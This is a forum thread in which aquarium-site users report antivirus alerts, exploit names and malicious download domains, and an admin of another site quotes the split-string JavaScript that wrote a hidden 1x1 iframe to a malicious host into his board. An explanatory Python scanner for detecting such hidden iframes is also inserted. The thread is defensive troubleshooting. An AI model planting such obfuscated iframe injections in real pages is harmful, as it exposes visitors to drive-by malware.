AA main page...Trojan?

ddcarnage said:
Ok I'm not sure if this is going to help you guys but I've solved my problem. I had been hacked because of a vulnerability in a third party php script I was using some time ago.

It seems that when my system was compromised, the hackers modified a very important php file in my message board system to print the following :

Code:
document.write("<ifr"+"ame src=http://goo"+"gler"+"ank.info/cou"+"nter width=1 height=1 style=displ"+"ay:none></ifra"+"me>");

Removing that solved the virus problem.

Cheers and good luck.

If this works I think there should be an aquarium advice poetry competition in honour of our helpful friend.

"An ode to my Dwarf Cichlid" 8)

John
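The injection ddcarnage found is a hidden 1x1 iframe whose markup is split into short string pieces joined with `+`, so a plain search for `<iframe` in the modified php file finds nothing. The script below is an added example (not code from this thread, from AA or from ddcarnage's message board) of a defender-side check: it joins adjacent string literals the way the browser would, then looks for iframes that are sized to 1 pixel or hidden by CSS. The sample php text and the `example.invalid` host in it are constructed for the demonstration.

```python
import re

# Constructed sample: one legitimate line and one line carrying the kind of
# split-string injection described in the post (host is a placeholder).
SAMPLE_PHP = r'''<?php
echo "<div class=\"footer\">";
echo '<script>document.write("<ifr"+"ame src=http://example.invalid/cou"+"nter width=1 height=1 style=displ"+"ay:none></ifra"+"me>");</script>';
echo "</div>";
?>'''

# "abc" + "def" (or 'abc' + 'def') -> "abcdef"; escapes inside the literal are kept.
_CONCAT = re.compile(r'''(["'])((?:(?!\1)[^\\]|\\.)*)\1\s*\+\s*\1((?:(?!\1)[^\\]|\\.)*)\1''')

# An iframe that is 1 or 0 pixels wide/high or hidden via CSS is the classic
# drive-by loader shape; ordinary embedded players do not look like this.
_HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*?(?:width\s*=\s*["\']?[01]\b|height\s*=\s*["\']?[01]\b'
    r'|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>',
    re.I,
)
_SRC = re.compile(r'''src\s*=\s*["']?([^\s"'>]+)''', re.I)


def join_string_concats(text):
    """Merge chains of concatenated string literals until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(3) + m.group(1), text)
    return text


def scan_text(text):
    """Return one finding per hidden iframe, with the line it sits on,
    whether string splitting hid it, and the src it points at."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        normalized = join_string_concats(line)
        for m in _HIDDEN_IFRAME.finditer(normalized):
            src = _SRC.search(m.group(0))
            findings.append({
                "line": lineno,
                "obfuscated": normalized != line,
                "src": src.group(1) if src else None,
                "tag": m.group(0),
            })
    return findings


def scan_file(path):
    """Convenience wrapper for running the check over a real php/js file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read())


if __name__ == "__main__":
    for finding in scan_text(SAMPLE_PHP):
        print(f"line {finding['line']}: hidden iframe -> {finding['src']}"
              f" (split-string obfuscation: {finding['obfuscated']})")
```

Running it over the sample reports the injected line, the reassembled `src`, and that the markup was split up; pointed at a real install with `scan_file`, it is a cheap way to confirm whether the hidden iframe lives in the board's own php (as in ddcarnage's case) or only in content pulled in from elsewhere.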
 
ddcarnage said:
Hello,

I'm the admin of a poetry website (lapassiondespoemes.com). We're running a totally custom message board system and we've been having the exact same problem. I found this thread on google while searching for info on the problem.

Users reported files being downloaded from s99.winmplayer.com at first. Now it seems to have switched to s99.msiesettings.com.

I'll post more info here if ever I find any...

Frank

Just stumbled on this thread...

I can report the same issue regarding the domains noted above. I *think* it's the same issue AA had on their main page several months ago... some bad code in a counter or a compromised banner ad?

My Norton Firewall picked it up, and I'm running Firefox with totally up-to-date Vista32. Just thought I'd pass it on.
 
Just wanted to report the same problem....

PC1 - Windows XP , IE7, AVG 7.5
PC2 - Vista Business, IE7, Sophos AV

Both PCs report 3 viruses and cause my PC to slow right down for approx 3 minutes while they are removed.
 
Kurt_Nelson said:
ddcarnage said:
Hello,

I'm the admin of a poetry website (lapassiondespoemes.com). We're running a totally custom message board system and we've been having the exact same problem. I found this thread on google while searching for info on the problem.

Users reported files being downloaded from s99.winmplayer.com at first. Now it seems to have switched to s99.msiesettings.com.

I'll post more info here if ever I find any...

Frank

Just stumbled on this thread...

I can report the same issue regarding the domains noted above. I *think* it's the same issue AA had on their main page several months ago... some bad code in a counter or a compromised banner ad?

My Norton Firewall picked it up, and I'm running Firefox with totally up-to-date Vista32. Just thought I'd pass it on.

Actually... what I meant to say, but failed to type it (!), was that I had this problem right around the same time "Frank" did. But it was only for a day. I'm not picking up any issues at this time. Because it's an on again, off again thing, that's why I'm thinking it's tied into one of the rotating banners, or a counter - something that isn't hard coded on your server. Someone is hacking into code that's being linked into AA... not AA itself.
 
I took note yesterday that when it popped up the Aquarium Guys banner was at the top. When I refreshed again to the Aquarium Guys banner it didn't cause the alert.
 
I take back my previous comment. NAV firewall blocked it again tonight:

Details: Attempted Intrusion "HTTP WebViewFolderIcon SetSlice BO" against your machine was detected and blocked.
Intruder: s99.msiesettings.com(http(80)).

You might check out this thread...

http://forum.powweb.com/showthread.php?p=426599

Sounds like they got rid of it. (And AA got a plug too!)
 
I've been getting various quarantines here using IE 7 and Webroot Spy Sweeper. Today it quarantined the same virus numerous times on different forum pages.

JS/CryptDown-A
 
For the first time yesterday I used IE and it gave me the warning. I just use Firefox and never have a problem.
 
I use IE all the time, and never got anything til just now. It acted like it wanted to crash my laptop. My AVG came up with 2 viruses and 1 Trojan, both are still in my AVG Virus Vault. The 2 viruses are as follows:
Exploit
Exploit.CVE-2005-1790

And the Trojan is:
Trojan horse Exploit.CVE-2006-1359

The first virus AVG has as Healable, but the other 2 are not Healable.
So I just deleted all 3 now. Will see if it comes up again.

When I got them, my system also told me it was almost out of resources, and said Windows needed to increase page file size, and that some programs might need to be closed for this operation to complete. The only thing I even had open was IE, and only have AVG running in the background.
 
Whatever the problem is they need to fix it. I too receive a notification that my computer blocked a hack attempt each time I log into the site. This thread has been opened almost a month now. What are they doing?
 
I'm now up to four different viruses being blocked simultaneously when I first visit the site. This appears to be getting worse. I may have to take a break from AA until the problem is fixed, because this last time it brought my laptop to a screeching halt and one of the viruses couldn't be cleaned or quarantined. Luckily it was an older exploit that my system has already been patched to avoid.
 
Looks like I'll have to stay off AA for a few weeks until the server is cleaned of Trojans/Viruses.

at home
Win XP SP2 media center edition
IE 6
McAfee finds the trojan

at work
Win XP SP2 professional
IE 6
Trend Micro Professional found trojan one time and now the firewall seems to be blocking further downloads of the trojan on future visits.
 
chase33 said:
Whatever the problem is they need to fix it. I too receive a notification that my computer blocked a hack attempt each time I log into the site. This thread has been opened almost a month now. What are they doing?

The problem is that "they" is probably just one guy! It's not like AA has an IT staff or anything!

This thing is annoying, but I can see where it's hard to track down. Like right now, I've surfed all over the AA site, TRYING to sniff where it's at, and it's not giving me any warnings. It comes and goes. While I have no knowledge of what's being done behind the scenes, it doesn't appear that it's something hard coded/hacked on the AA site - or we'd get the warnings all the time. Most likely, one of the external links/banners has been hacked and it's being pulled in from there. That's probably what's making it tricky to find and fix... the source is not within AA's control.

Just another good lesson on why it's important to use a firewall and/or antivirus scanners.
 
This is what Fishfreek said a few posts back:

Not constantly posting does not mean one is not looking into this. I have been looking into this for a while and trying random code removals to correct it. This site is heavily modded and removing the wrong thing will take the site down 100%. I have never seen this message myself and I run McAfee at work and AVG at home. Both reported as giving the error.

Please be patient.
 
Kurt is correct. We do not have an IT Department. The admins are trying to take care of the problem but as Lindsay pointed out, FF is aware of the problem and is trying to fix it. I don't know if it's a banner problem or not. I get the error message from the first page I open a post directly from an e-mail notification. If I have 40 AA e-mails the Trojan will only appear on the first e-mail that I click from. It doesn't matter what banner is at the top of the page or who has responded to the post.
 
Fishyfanatic said:
...If I have 40 AA e-mails the Trojan will only appear on the first e-mail that I click from. It doesn't matter what banner is at the top of the page or who has responded to the post.

Actually... depending on what type of firewall you're running, the offending script might be associated with all the emails - or actually the AA page you're linking to -, but you're just seeing the warning on the first one. With me, my firewall detects the script and then blocks the IP address that script is being called from for 30 minutes. That 30 minute "time out" would give the appearance that the first email was the bad one, but all the rest were OK. In reality, they're probably all bad, but because of the 30 minute block on that IP, you're not seeing it anymore.

Hope that makes sense...
 